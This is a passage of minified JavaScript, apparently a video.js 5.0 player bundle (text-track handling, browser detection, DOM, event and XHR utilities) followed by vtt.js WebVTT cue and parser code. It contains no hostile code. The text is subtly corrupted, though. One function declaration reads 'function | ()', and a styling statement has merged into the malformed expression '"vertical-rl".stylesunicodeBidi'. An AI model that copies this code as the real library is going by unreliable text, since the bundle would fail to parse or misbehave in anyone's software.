0});y.prototype=Object.create(r["default"].prototype),y.prototype.constructor=y,y.prototype.allowedEvents_={cuechange:"cuechange"},y.prototype.addCue=function(a){var b=this.tech_.textTracks();if(b)for(var c=0;c<b.length;c++)b[c]!==this&&b[c].removeCue(a);this.cues_.push(a),this.cues.setCues_(this.cues_)},y.prototype.removeCue=function(a){for(var b=!1,c=0,d=this.cues_.length;d>c;c++){var e=this.cues_[c];e===a&&(this.cues_.splice(c,1),b=!0)}b&&this.cues.setCues_(this.cues_)};var z=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(a,b){if("function"!=typeof v["default"].WebVTT)return v["default"].setTimeout(function(){z(a,b)},25);var c=new v["default"].WebVTT.Parser(v["default"],v["default"].vttjs,v["default"].WebVTT.StringDecoder());c.oncue=function(a){b.addCue(a)},c.onparsingerror=function(a){p["default"].error(a)},c.parse(a),c.flush()}),A=function(a,b){x["default"](a,h.bind(this,function(a,c,d){return a?p["default"].error(a):(b.loaded_=!0,void z(d,b))}))},B=function(a,b){if(null==this)throw new TypeError('"this" is null or not defined');var c=Object(this),d=c.length>>>0;if(0===d)return-1;var e=+b||0;if(Math.abs(e)===1/0&&(e=0),e>=d)return-1;for(var f=Math.max(e>=0?e:d-Math.abs(e),0);d>f;){if(f in c&&c[f]===a)return f;f++}return-1};c["default"]=y,b.exports=c["default"]},{"../event-emitter":83,"../utils/browser.js":108,"../utils/fn.js":113,"../utils/guid.js":115,"../utils/log.js":116,"../xhr.js":123,"./text-track-cue-list":102,"./text-track-enums":104,"global/document":1,"global/window":2}],108:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("global/document"),f=d(e),g=a("global/window"),h=d(g),i=h["default"].navigator.userAgent,j=/iPhone/i.test(i);c.IS_IPHONE=j;var k=/iPad/i.test(i);c.IS_IPAD=k;var l=/iPod/i.test(i);c.IS_IPOD=l;var m=j||k||l;c.IS_IOS=m;var n=function(){var a=i.match(/OS (\d+)_/i);return a&&a[1]?a[1]:void 0}();c.IOS_VERSION=n;var o=/Android/i.test(i);c.IS_ANDROID=o;var p=function(){var a,b,c=i.match(/Android (\d+)(?:\.(\d+))?(?:\.(\d+))*/i);return c?(a=c[1]&&parseFloat(c[1]),b=c[2]&&parseFloat(c[2]),a&&b?parseFloat(c[1]+"."+c[2]):a?a:null):null}();c.ANDROID_VERSION=p;var q=o&&/webkit/i.test(i)&&2.3>p;c.IS_OLD_ANDROID=q;var r=/Firefox/i.test(i);c.IS_FIREFOX=r;var s=/Chrome/i.test(i);c.IS_CHROME=s;var t=/MSIE\s8\.0/.test(i);c.IS_IE8=t;var u=!!("ontouchstart"in h["default"]||h["default"].DocumentTouch&&f["default"]instanceof h["default"].DocumentTouch);c.TOUCH_ENABLED=u;var v="backgroundSize"in f["default"].createElement("video").style;c.BACKGROUND_SIZE_SUPPORTED=v},{"global/document":1,"global/window":2}],109:[function(a,b,c){"use strict";function d(a,b){var c,d,f=0;if(!b)return 0;a&&a.length||(a=e.createTimeRange(0,0));for(var g=0;g<a.length;g++)c=a.start(g),d=a.end(g),d>b&&(d=b),f+=d-c;return f/b}c.__esModule=!0,c.bufferedPercent=d;var e=a("./time-ranges.js")},{"./time-ranges.js":119}],110:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./log.js"),f=d(e),g={get:function(a,b){return a[b]},set:function(a,b,c){return a[b]=c,!0}};c["default"]=function(a){var b=void 0===arguments[1]?{}:arguments[1];if("function"==typeof Proxy){var c=function(){var c={};return Object.keys(b).forEach(function(a){g.hasOwnProperty(a)&&(c[a]=function(){return f["default"].warn(b[a]),g[a].apply(this,arguments)})}),{v:new Proxy(a,c)}}();if("object"==typeof c)return c.v}return a},b.exports=c["default"]},{"./log.js":116}],111:[function(a,b,c){"use strict";function d(a){return 0===a.indexOf("#")&&(a=a.slice(1)),t["default"].getElementById(a)}function | (){var a=void 0===arguments[0]?"div":arguments[0],b=void 0===arguments[1]?{}:arguments[1],c=t["default"].createElement(a);return Object.getOwnPropertyNames(b).forEach(function(a){var d=b[a];-1!==a.indexOf("aria-")||"role"===a?c.setAttribute(a,d):c[a]=d}),c}function f(a,b){b.firstChild?b.insertBefore(a,b.firstChild):b.appendChild(a)}function g(a){var b=a[B];return b||(b=a[B]=x.newGUID()),A[b]||(A[b]={}),A[b]}function h(a){var b=a[B];return b?!!Object.getOwnPropertyNames(A[b]).length:!1}function i(a){var b=a[B];if(b){delete A[b];try{delete a[B]}catch(c){a.removeAttribute?a.removeAttribute(B):a[B]=null}}}function j(a,b){return-1!==(" "+a.className+" ").indexOf(" "+b+" ")}function k(a,b){j(a,b)||(a.className=""===a.className?b:a.className+" "+b)}function l(a,b){if(j(a,b)){for(var c=a.className.split(" "),d=c.length-1;d>=0;d--)c[d]===b&&c.splice(d,1);a.className=c.join(" ")}}function m(a,b){Object.getOwnPropertyNames(b).forEach(function(c){var d=b[c];null===d||"undefined"==typeof d||d===!1?a.removeAttribute(c):a.setAttribute(c,d===!0?"":d)})}function n(a){var b,c,d,e,f;if(b={},c=",autoplay,controls,loop,muted,default,",a&&a.attributes&&a.attributes.length>0){d=a.attributes;for(var g=d.length-1;g>=0;g--)e=d[g].name,f=d[g].value,("boolean"==typeof a[e]||-1!==c.indexOf(","+e+","))&&(f=null!==f?!0:!1),b[e]=f}return b}function o(){t["default"].body.focus(),t["default"].onselectstart=function(){return!1}}function p(){t["default"].onselectstart=function(){return!0}}function q(a){var b=void 0;if(a.getBoundingClientRect&&a.parentNode&&(b=a.getBoundingClientRect()),!b)return{left:0,top:0};var c=t["default"].documentElement,d=t["default"].body,e=c.clientLeft||d.clientLeft||0,f=v["default"].pageXOffset||d.scrollLeft,g=b.left+f-e,h=c.clientTop||d.clientTop||0,i=v["default"].pageYOffset||d.scrollTop,j=b.top+i-h;return{left:z["default"](g),top:z["default"](j)}}var r=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0,c.getEl=d,c.createEl=e,c.insertElFirst=f,c.getElData=g,c.hasElData=h,c.removeElData=i,c.hasElClass=j,c.addElClass=k,c.removeElClass=l,c.setElAttributes=m,c.getElAttributes=n,c.blockTextSelection=o,c.unblockTextSelection=p,c.findElPosition=q;var s=a("global/document"),t=r(s),u=a("global/window"),v=r(u),w=a("./guid.js"),x=r(w),y=a("./round-float.js"),z=r(y),A={},B="vdata"+(new Date).getTime()},{"./guid.js":115,"./round-float.js":118,"global/document":1,"global/window":2}],112:[function(a,b,c){"use strict";function d(a,b,c){if(Array.isArray(b))return j(d,a,b,c);var e=m.getElData(a);e.handlers||(e.handlers={}),e.handlers[b]||(e.handlers[b]=[]),c.guid||(c.guid=o.newGUID()),e.handlers[b].push(c),e.dispatcher||(e.disabled=!1,e.dispatcher=function(b,c){if(!e.disabled){b=h(b);var d=e.handlers[b.type];if(d)for(var f=d.slice(0),g=0,i=f.length;i>g&&!b.isImmediatePropagationStopped();g++)f[g].call(a,b,c);
}}),1===e.handlers[b].length&&(a.addEventListener?a.addEventListener(b,e.dispatcher,!1):a.attachEvent&&a.attachEvent("on"+b,e.dispatcher))}function e(a,b,c){if(m.hasElData(a)){var d=m.getElData(a);if(d.handlers){if(Array.isArray(b))return j(e,a,b,c);var f=function(b){d.handlers[b]=[],i(a,b)};if(b){var g=d.handlers[b];if(g){if(!c)return void f(b);if(c.guid)for(var h=0;h<g.length;h++)g[h].guid===c.guid&&g.splice(h--,1);i(a,b)}}else for(var k in d.handlers)f(k)}}}function f(a,b,c){var d=m.hasElData(a)?m.getElData(a):{},e=a.parentNode||a.ownerDocument;if("string"==typeof b&&(b={type:b,target:a}),b=h(b),d.dispatcher&&d.dispatcher.call(a,b,c),e&&!b.isPropagationStopped()&&b.bubbles===!0)f.call(null,e,b,c);else if(!e&&!b.defaultPrevented){var g=m.getElData(b.target);b.target[b.type]&&(g.disabled=!0,"function"==typeof b.target[b.type]&&b.target[b.type](),g.disabled=!1)}return!b.defaultPrevented}function g(a,b,c){if(Array.isArray(b))return j(g,a,b,c);var f=function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){e(a,b,f),c.apply(this,arguments)});f.guid=c.guid=c.guid||o.newGUID(),d(a,b,f)}function h(a){function b(){return!0}function c(){return!1}if(!a||!a.isPropagationStopped){var d=a||q["default"].event;a={};for(var e in d)"layerX"!==e&&"layerY"!==e&&"keyLocation"!==e&&("returnValue"===e&&d.preventDefault||(a[e]=d[e]));if(a.target||(a.target=a.srcElement||s["default"]),a.relatedTarget||(a.relatedTarget=a.fromElement===a.target?a.toElement:a.fromElement),a.preventDefault=function(){d.preventDefault&&d.preventDefault(),a.returnValue=!1,a.defaultPrevented=!0},a.defaultPrevented=!1,a.stopPropagation=function(){d.stopPropagation&&d.stopPropagation(),a.cancelBubble=!0,a.isPropagationStopped=b},a.isPropagationStopped=c,a.stopImmediatePropagation=function(){d.stopImmediatePropagation&&d.stopImmediatePropagation(),a.isImmediatePropagationStopped=b,a.stopPropagation()},a.isImmediatePropagationStopped=c,null!=a.clientX){var f=s["default"].documentElement,g=s["default"].body;a.pageX=a.clientX+(f&&f.scrollLeft||g&&g.scrollLeft||0)-(f&&f.clientLeft||g&&g.clientLeft||0),a.pageY=a.clientY+(f&&f.scrollTop||g&&g.scrollTop||0)-(f&&f.clientTop||g&&g.clientTop||0)}a.which=a.charCode||a.keyCode,null!=a.button&&(a.button=1&a.button?0:4&a.button?1:2&a.button?2:0)}return a}function i(a,b){var c=m.getElData(a);0===c.handlers[b].length&&(delete c.handlers[b],a.removeEventListener?a.removeEventListener(b,c.dispatcher,!1):a.detachEvent&&a.detachEvent("on"+b,c.dispatcher)),Object.getOwnPropertyNames(c.handlers).length<=0&&(delete c.handlers,delete c.dispatcher,delete c.disabled),0===Object.getOwnPropertyNames(c).length&&m.removeElData(a)}function j(a,b,c,d){c.forEach(function(c){a(b,c,d)})}var k=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0,c.on=d,c.off=e,c.trigger=f,c.one=g,c.fixEvent=h;var l=a("./dom.js"),m=k(l),n=a("./guid.js"),o=k(n),p=a("global/window"),q=k(p),r=a("global/document"),s=k(r)},{"./dom.js":111,"./guid.js":115,"global/document":1,"global/window":2}],113:[function(a,b,c){"use strict";c.__esModule=!0;var d=a("./guid.js"),e=function(a,b,c){b.guid||(b.guid=d.newGUID());var e=function(){return b.apply(a,arguments)};return e.guid=c?c+"_"+b.guid:b.guid,e};c.bind=e},{"./guid.js":115}],114:[function(a,b,c){"use strict";function d(a){var b=void 0===arguments[1]?a:arguments[1];return function(){var c=Math.floor(a%60),d=Math.floor(a/60%60),e=Math.floor(a/3600),f=Math.floor(b/60%60),g=Math.floor(b/3600);return(isNaN(a)||a===1/0)&&(e=d=c="-"),e=e>0||g>0?e+":":"",d=((e||f>=10)&&10>d?"0"+d:d)+":",c=10>c?"0"+c:c,e+d+c}()}c.__esModule=!0,c["default"]=d,b.exports=c["default"]},{}],115:[function(a,b,c){"use strict";function d(){return e++}c.__esModule=!0,c.newGUID=d;var e=1},{}],116:[function(a,b,c){"use strict";function d(a,b){var c=Array.prototype.slice.call(b),d=function(){},e=g["default"].console||{log:d,warn:d,error:d};a?c.unshift(a.toUpperCase()+":"):a="log",h.history.push(c),c.unshift("VIDEOJS:"),e[a].apply?e[a].apply(e,c):e[a](c.join(" "))}var e=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var f=a("global/window"),g=e(f),h=function(){d(null,arguments)};h.history=[],h.error=function(){d("error",arguments)},h.warn=function(){d("warn",arguments)},c["default"]=h,b.exports=c["default"]},{"global/window":2}],117:[function(a,b,c){"use strict";function d(a){return!!a&&"object"==typeof a&&"[object Object]"===a.toString()&&a.constructor===Object}function e(){var a=void 0===arguments[0]?{}:arguments[0];return Array.prototype.slice.call(arguments,1).forEach(function(b){h["default"](a,b,function(a,b){return d(b)?d(a)?void 0:e({},b):b})}),a}var f=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0,c["default"]=e;var g=a("lodash-compat/object/merge"),h=f(g);b.exports=c["default"]},{"lodash-compat/object/merge":40}],118:[function(a,b,c){"use strict";c.__esModule=!0;var d=function(a){var b=void 0===arguments[1]?0:arguments[1];return Math.round(a*Math.pow(10,b))/Math.pow(10,b)};c["default"]=d,b.exports=c["default"]},{}],119:[function(a,b,c){"use strict";function d(a,b){return void 0===a&&void 0===b?{length:0,start:function(){throw new Error("This TimeRanges object is empty")},end:function(){throw new Error("This TimeRanges object is empty")}}:{length:1,start:function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){return a}),end:function(a){function b(){return a.apply(this,arguments)}return b.toString=function(){return a.toString()},b}(function(){return b})}}c.__esModule=!0,c.createTimeRange=d},{}],120:[function(a,b,c){"use strict";function d(a){return a.charAt(0).toUpperCase()+a.slice(1)}c.__esModule=!0,c["default"]=d,b.exports=c["default"]},{}],121:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("global/document"),f=d(e),g=function(a){var b=["protocol","hostname","port","pathname","search","hash","host"],c=f["default"].createElement("a");c.href=a;var d=""===c.host&&"file:"!==c.protocol,e=void 0;d&&(e=f["default"].createElement("div"),e.innerHTML='<a href="'+a+'"></a>',c=e.firstChild,e.setAttribute("style","display:none; position:absolute;"),f["default"].body.appendChild(e));for(var g={},h=0;h<b.length;h++)g[b[h]]=c[b[h]];return"http:"===g.protocol&&(g.host=g.host.replace(/:80$/,"")),"https:"===g.protocol&&(g.host=g.host.replace(/:443$/,"")),d&&f["default"].body.removeChild(e),g};c.parseUrl=g;var h=function(a){if(!a.match(/^https?:\/\//)){var b=f["default"].createElement("div");b.innerHTML='<a href="'+a+'">x</a>',a=b.firstChild.href}return a};c.getAbsoluteURL=h;var i=function(a){if("string"==typeof a){var b=/^(\/?)([\s\S]*?)((?:\.{1,2}|[^\/]+?)(\.([^\.\/\?]+)))(?:[\/]*|[\?].*)$/i,c=b.exec(a);if(c)return c.pop().toLowerCase()}return""};c.getFileExtension=i},{"global/document":1}],122:[function(b,c,d){"use strict";var e=function(a){return a&&a.__esModule?a:{"default":a}};d.__esModule=!0;{var f=b("global/document"),g=e(f),h=b("./setup"),i=e(h),j=b("./component"),k=e(j),l=b("./global-options.js"),m=e(l),n=b("./player"),o=e(n),p=b("./plugins.js"),q=e(p),r=b("../../src/js/utils/merge-options.js"),s=e(r),t=b("./utils/fn.js"),u=e(t),v=b("object.assign"),w=(e(v),b("./utils/time-ranges.js")),x=b("./utils/log.js"),y=e(x),z=b("./xhr.js"),A=e(z),B=b("./utils/dom.js"),C=e(B),D=b("./utils/browser.js"),E=e(D),F=b("./extends.js"),G=e(F),H=b("lodash-compat/object/merge"),I=e(H),J=b("./utils/create-deprecation-proxy.js"),K=e(J),L=b("./tech/html5.js"),M=(e(L),b("./tech/flash.js"));e(M)}"undefined"==typeof HTMLVideoElement&&(g["default"].createElement("video"),g["default"].createElement("audio"),g["default"].createElement("track"));var N=function(a,b,c){var d;if("string"==typeof a){if(0===a.indexOf("#")&&(a=a.slice(1)),o["default"].players[a])return b&&y["default"].warn('Player "'+a+'" is already initialised. Options will not be applied.'),c&&o["default"].players[a].ready(c),o["default"].players[a];d=C.getEl(a)}else d=a;if(!d||!d.nodeName)throw new TypeError("The element or ID supplied is not valid. (videojs)");return d.player||new o["default"](d,b,c)};i.autoSetupTimeout(1,N),N.VERSION="5.0.0-rc.32",N.getGlobalOptions=function(){return m["default"]},N.options=K["default"](m["default"],{get:"Access to videojs.options is deprecated; use videojs.getGlobalOptions instead",set:"Modification of videojs.options is deprecated; use videojs.setGlobalOptions instead"}),N.setGlobalOptions=function(a){return s["default"](m["default"],a)},N.getPlayers=function(){return o["default"].players},N.players=K["default"](o["default"].players,{get:"Access to videojs.players is deprecated; use videojs.getPlayers instead",set:"Modification of videojs.players is deprecated"}),N.getComponent=k["default"].getComponent,N.registerComponent=k["default"].registerComponent,N.browser=E,N["extends"]=G["default"],N.mergeOptions=s["default"],N.bind=u.bind,N.plugin=q["default"],N.addLanguage=function(a,b){var c;return a=(""+a).toLowerCase(),I["default"](m["default"].languages,(c={},c[a]=b,c))[a]},N.log=y["default"],N.createTimeRange=w.createTimeRange,N.xhr=A["default"],"function"==typeof a&&a.amd?a("videojs",[],function(){return N}):"object"==typeof d&&"object"==typeof c&&(c.exports=N),d["default"]=N,c.exports=d["default"]},{"../../src/js/utils/merge-options.js":117,"./component":52,"./extends.js":84,"./global-options.js":86,"./player":92,"./plugins.js":93,"./setup":95,"./tech/flash.js":98,"./tech/html5.js":99,"./utils/browser.js":108,"./utils/create-deprecation-proxy.js":110,"./utils/dom.js":111,"./utils/fn.js":113,"./utils/log.js":116,"./utils/time-ranges.js":119,"./xhr.js":123,"global/document":1,"lodash-compat/object/merge":40,"object.assign":44}],123:[function(a,b,c){"use strict";var d=function(a){return a&&a.__esModule?a:{"default":a}};c.__esModule=!0;var e=a("./utils/url.js"),f=d(e),g=a("./utils/log.js"),h=(d(g),a("./utils/merge-options.js")),i=d(h),j=a("global/window"),k=d(j),l=function(a,b){var c=void 0;"string"==typeof a&&(a={uri:a}),a=i["default"]({method:"GET",timeout:45e3},a),b=b||function(){};var d=k["default"].XMLHttpRequest;"undefined"==typeof d&&(d=function(){try{return new k["default"].ActiveXObject("Msxml2.XMLHTTP.6.0")}catch(a){}try{return new k["default"].ActiveXObject("Msxml2.XMLHTTP.3.0")}catch(b){}try{return new k["default"].ActiveXObject("Msxml2.XMLHTTP")}catch(c){}throw new Error("This browser does not support XMLHttpRequest.")});var e=new d;e.uri=a.uri;var g=f.parseUrl(a.uri),h=k["default"].location,j=function(){k["default"].clearTimeout(c),b(null,e,e.response||e.responseText)},l=function(a){k["default"].clearTimeout(c),a&&"string"!=typeof a||(a=new Error(a)),b(a,e)},m=g.protocol+g.host!==h.protocol+h.host;!m||!k["default"].XDomainRequest||"withCredentials"in e?!function(){var b="file:"===g.protocol||"file:"===h.protocol;e.onreadystatechange=function(){if(4===e.readyState){if(e.timedout)return l("timeout");200===e.status||b&&0===e.status?j():l()}},a.timeout&&(c=k["default"].setTimeout(function(){4!==e.readyState&&(e.timedout=!0,e.abort())},a.timeout))}():(e=new k["default"].XDomainRequest,e.onload=j,e.onerror=l,e.onprogress=function(){},e.ontimeout=function(){});try{e.open(a.method||"GET",a.uri,!0)}catch(n){return l(n)}a.withCredentials&&(e.withCredentials=!0),a.responseType&&(e.responseType=a.responseType);try{e.send()}catch(n){return l(n)}return e};c["default"]=l,b.exports=c["default"]},{"./utils/log.js":116,"./utils/merge-options.js":117,"./utils/url.js":121,"global/window":2}]},{},[122])(122)}),function(a){var b=a.vttjs={},c=b.VTTCue,d=b.VTTRegion,e=a.VTTCue,f=a.VTTRegion;b.shim=function(){b.VTTCue=c,b.VTTRegion=d},b.restore=function(){b.VTTCue=e,b.VTTRegion=f}}(this),function(a,b){function c(a){if("string"!=typeof a)return!1;var b=h[a.toLowerCase()];return b?a.toLowerCase():!1}function d(a){if("string"!=typeof a)return!1;var b=i[a.toLowerCase()];return b?a.toLowerCase():!1}function e(a){for(var b=1;b<arguments.length;b++){var c=arguments[b];for(var d in c)a[d]=c[d]}return a}function f(a,b,f){var h=this,i=/MSIE\s8\.0/.test(navigator.userAgent),j={};i?h=document.createElement("custom"):j.enumerable=!0,h.hasBeenReset=!1;var k="",l=!1,m=a,n=b,o=f,p=null,q="",r=!0,s="auto",t="start",u=50,v="middle",w=50,x="middle";return Object.defineProperty(h,"id",e({},j,{get:function(){return k},set:function(a){k=""+a}})),Object.defineProperty(h,"pauseOnExit",e({},j,{get:function(){return l},set:function(a){l=!!a}})),Object.defineProperty(h,"startTime",e({},j,{get:function(){return m},set:function(a){if("number"!=typeof a)throw new TypeError("Start time must be set to a number.");m=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"endTime",e({},j,{get:function(){return n},set:function(a){if("number"!=typeof a)throw new TypeError("End time must be set to a number.");n=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"text",e({},j,{get:function(){return o},set:function(a){o=""+a,this.hasBeenReset=!0}})),Object.defineProperty(h,"region",e({},j,{get:function(){return p},set:function(a){p=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"vertical",e({},j,{get:function(){return q},set:function(a){var b=c(a);if(b===!1)throw new SyntaxError("An invalid or illegal string was specified.");q=b,this.hasBeenReset=!0}})),Object.defineProperty(h,"snapToLines",e({},j,{get:function(){return r},set:function(a){r=!!a,this.hasBeenReset=!0}})),Object.defineProperty(h,"line",e({},j,{get:function(){return s},set:function(a){if("number"!=typeof a&&a!==g)throw new SyntaxError("An invalid number or illegal string was specified.");s=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"lineAlign",e({},j,{get:function(){return t},set:function(a){var b=d(a);if(!b)throw new SyntaxError("An invalid or illegal string was specified.");t=b,this.hasBeenReset=!0}})),Object.defineProperty(h,"position",e({},j,{get:function(){return u},set:function(a){if(0>a||a>100)throw new Error("Position must be between 0 and 100.");u=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"positionAlign",e({},j,{get:function(){return v},set:function(a){var b=d(a);if(!b)throw new SyntaxError("An invalid or illegal string was specified.");v=b,this.hasBeenReset=!0}})),Object.defineProperty(h,"size",e({},j,{get:function(){return w},set:function(a){if(0>a||a>100)throw new Error("Size must be between 0 and 100.");w=a,this.hasBeenReset=!0}})),Object.defineProperty(h,"align",e({},j,{get:function(){return x},set:function(a){var b=d(a);if(!b)throw new SyntaxError("An invalid or illegal string was specified.");x=b,this.hasBeenReset=!0}})),h.displayState=void 0,i?h:void 0}var g="auto",h={"":!0,lr:!0,rl:!0},i={start:!0,middle:!0,end:!0,left:!0,right:!0};f.prototype.getCueAsHTML=function(){return WebVTT.convertCueToDOMTree(window,this.text)},a.VTTCue=a.VTTCue||f,b.VTTCue=f}(this,this.vttjs||{}),function(a,b){function c(a){if("string"!=typeof a)return!1;var b=f[a.toLowerCase()];return b?a.toLowerCase():!1}function d(a){return"number"==typeof a&&a>=0&&100>=a}function e(){var a=100,b=3,e=0,f=100,g=0,h=100,i="";Object.defineProperties(this,{width:{enumerable:!0,get:function(){return a},set:function(b){if(!d(b))throw new Error("Width must be between 0 and 100.");a=b}},lines:{enumerable:!0,get:function(){return b},set:function(a){if("number"!=typeof a)throw new TypeError("Lines must be set to a number.");b=a}},regionAnchorY:{enumerable:!0,get:function(){return f},set:function(a){if(!d(a))throw new Error("RegionAnchorX must be between 0 and 100.");f=a}},regionAnchorX:{enumerable:!0,get:function(){return e},set:function(a){if(!d(a))throw new Error("RegionAnchorY must be between 0 and 100.");e=a}},viewportAnchorY:{enumerable:!0,get:function(){return h},set:function(a){if(!d(a))throw new Error("ViewportAnchorY must be between 0 and 100.");h=a}},viewportAnchorX:{enumerable:!0,get:function(){return g},set:function(a){if(!d(a))throw new Error("ViewportAnchorX must be between 0 and 100.");g=a}},scroll:{enumerable:!0,get:function(){return i},set:function(a){var b=c(a);if(b===!1)throw new SyntaxError("An invalid or illegal string was specified.");i=b}}})}var f={"":!0,up:!0};a.VTTRegion=a.VTTRegion||e,b.VTTRegion=e}(this,this.vttjs||{}),function(a){function b(a,b){this.name="ParsingError",this.code=a.code,this.message=b||a.message}function c(a){function b(a,b,c,d){return 3600*(0|a)+60*(0|b)+(0|c)+(0|d)/1e3}var c=a.match(/^(\d+):(\d{2})(:\d{2})?\.(\d{3})/);return c?c[3]?b(c[1],c[2],c[3].replace(":",""),c[4]):c[1]>59?b(c[1],c[2],0,c[4]):b(0,c[1],c[2],c[4]):null}function d(){this.values=o(null)}function e(a,b,c,d){var e=d?a.split(d):[a];for(var f in e)if("string"==typeof e[f]){var g=e[f].split(c);if(2===g.length){var h=g[0],i=g[1];b(h,i)}}}function f(a,f,g){function h(){var d=c(a);if(null===d)throw new b(b.Errors.BadTimeStamp,"Malformed timestamp: "+k);return a=a.replace(/^[^\sa-zA-Z-]+/,""),d}function i(a,b){var c=new d;e(a,function(a,b){switch(a){case"region":for(var d=g.length-1;d>=0;d--)if(g[d].id===b){c.set(a,g[d].region);break}break;case"vertical":c.alt(a,b,["rl","lr"]);break;case"line":var e=b.split(","),f=e[0];c.integer(a,f),c.percent(a,f)?c.set("snapToLines",!1):null,c.alt(a,f,["auto"]),2===e.length&&c.alt("lineAlign",e[1],["start","middle","end"]);break;case"position":e=b.split(","),c.percent(a,e[0]),2===e.length&&c.alt("positionAlign",e[1],["start","middle","end"]);break;case"size":c.percent(a,b);break;case"align":c.alt(a,b,["start","middle","end","left","right"])}},/:/,/\s/),b.region=c.get("region",null),b.vertical=c.get("vertical",""),b.line=c.get("line","auto"),b.lineAlign=c.get("lineAlign","start"),b.snapToLines=c.get("snapToLines",!0),b.size=c.get("size",100),b.align=c.get("align","middle"),b.position=c.get("position",{start:0,left:0,middle:50,end:100,right:100},b.align),b.positionAlign=c.get("positionAlign",{start:"start",left:"start",middle:"middle",end:"end",right:"end"},b.align)}function j(){a=a.replace(/^\s+/,"")}var k=a;if(j(),f.startTime=h(),j(),"-->"!==a.substr(0,3))throw new b(b.Errors.BadTimeStamp,"Malformed time stamp (time stamps must be separated by '-->'): "+k);a=a.substr(3),j(),f.endTime=h(),j(),i(a,f)}function g(a,b){function d(){function a(a){return b=b.substr(a.length),a}if(!b)return null;var c=b.match(/^([^<]*)(<[^>]+>?)?/);return a(c[1]?c[1]:c[2])}function e(a){return p[a]}function f(a){for(;o=a.match(/&(amp|lt|gt|lrm|rlm|nbsp);/);)a=a.replace(o[0],e);return a}function g(a,b){return!s[b.localName]||s[b.localName]===a.localName}function h(b,c){var d=q[b];if(!d)return null;var e=a.document.createElement(d);e.localName=d;var f=r[b];return f&&c&&(e[f]=c.trim()),e}for(var i,j=a.document.createElement("div"),k=j,l=[];null!==(i=d());)if("<"!==i[0])k.appendChild(a.document.createTextNode(f(i)));else{if("/"===i[1]){l.length&&l[l.length-1]===i.substr(2).replace(">","")&&(l.pop(),k=k.parentNode);continue}var m,n=c(i.substr(1,i.length-2));if(n){m=a.document.createProcessingInstruction("timestamp",n),k.appendChild(m);continue}var o=i.match(/^<([^.\s/0-9>]+)(\.[^\s\\>]+)?([^>\\]+)?(\\?)>?$/);if(!o)continue;if(m=h(o[1],o[3]),!m)continue;if(!g(k,m))continue;o[2]&&(m.className=o[2].substr(1).replace("."," ")),l.push(o[1]),k.appendChild(m),k=m}return j}function h(a){function b(a,b){for(var c=b.childNodes.length-1;c>=0;c--)a.push(b.childNodes[c])}function c(a){if(!a||!a.length)return null;var d=a.pop(),e=d.textContent||d.innerText;if(e){var f=e.match(/^.*(\n|\r)/);return f?(a.length=0,f[0]):e}return"ruby"===d.tagName?c(a):d.childNodes?(b(a,d),c(a)):void 0}var d,e=[],f="";if(!a||!a.childNodes)return"ltr";for(b(e,a);f=c(e);)for(var g=0;g<f.length;g++){d=f.charCodeAt(g);for(var h=0;h<t.length;h++)if(t[h]===d)return"rtl"}return"ltr"}function i(a){if("number"==typeof a.line&&(a.snapToLines||a.line>=0&&a.line<=100))return a.line;if(!a.track||!a.track.textTrackList||!a.track.textTrackList.mediaElement)return-1;for(var b=a.track,c=b.textTrackList,d=0,e=0;e<c.length&&c[e]!==b;e++)"showing"===c[e].mode&&d++;return-1*++d}function j(){}function k(a,b,c){var d=/MSIE\s8\.0/.test(navigator.userAgent),e="rgba(255, 255, 255, 1)",f="rgba(0, 0, 0, 0.8)";d&&(e="rgb(255, 255, 255)",f="rgb(0, 0, 0)"),j.call(this),this.cue=b,this.cueDiv=g(a,b.text);var i={color:e,backgroundColor:f,position:"relative",left:0,right:0,top:0,bottom:0,display:"inline"};d||(i.writingMode=""===b.vertical?"horizontal-tb":"lr"===b.vertical?"vertical-lr":"vertical-rl",i.unicodeBidi="plaintext"),this.applyStyles(i,this.cueDiv),this.div=a.document.createElement("div"),i={textAlign:"middle"===b.align?"center":b.align,font:c.font,whiteSpace:"pre-line",position:"absolute"},d||(i.direction=h(this.cueDiv),i.writingMode=""===b.vertical?"horizontal-tb":"lr"===b.vertical?"vertical-lr":"vertical-rl".stylesunicodeBidi="plaintext"),this.applyStyles(i),this.div.appendChild(this.cueDiv);var k=0;switch(b.positionAlign){case"start":k=b.position;break;case"middle":k=b.position-b.size/2;break;case"end":k=b.position-b.size}this.applyStyles(""===b.vertical?{left:this.formatStyle(k,"%"),width:this.formatStyle(b.size,"%")}:{top:this.formatStyle(k,"%"),height:this.formatStyle(b.size,"%")}),this.move=function(a){this.applyStyles({top:this.formatStyle(a.top,"px"),bottom:this.formatStyle(a.bottom,"px"),left:this.formatStyle(a.left,"px"),right:this.formatStyle(a.right,"px"),height:this.formatStyle(a.height,"px"),width:this.formatStyle(a.width,"px")})}}function l(a){var b,c,d,e,f=/MSIE\s8\.0/.test(navigator.userAgent);if(a.div){c=a.div.offsetHeight,d=a.div.offsetWidth,e=a.div.offsetTop;var g=(g=a.div.childNodes)&&(g=g[0])&&g.getClientRects&&g.getClientRects();a=a.div.getBoundingClientRect(),b=g?Math.max(g[0]&&g[0].height||0,a.height/g.length):0}this.left=a.left,this.right=a.right,this.top=a.top||e,this.height=a.height||c,this.bottom=a.bottom||e+(a.height||c),this.width=a.width||d,this.lineHeight=void 0!==b?b:a.lineHeight,f&&!this.lineHeight&&(this.lineHeight=13)}function m(a,b,c,d){function e(a,b){for(var e,f=new l(a),g=1,h=0;h<b.length;h++){for(;a.overlapsOppositeAxis(c,b[h])||a.within(c)&&a.overlapsAny(d);)a.move(b[h]);if(a.within(c))return a;var 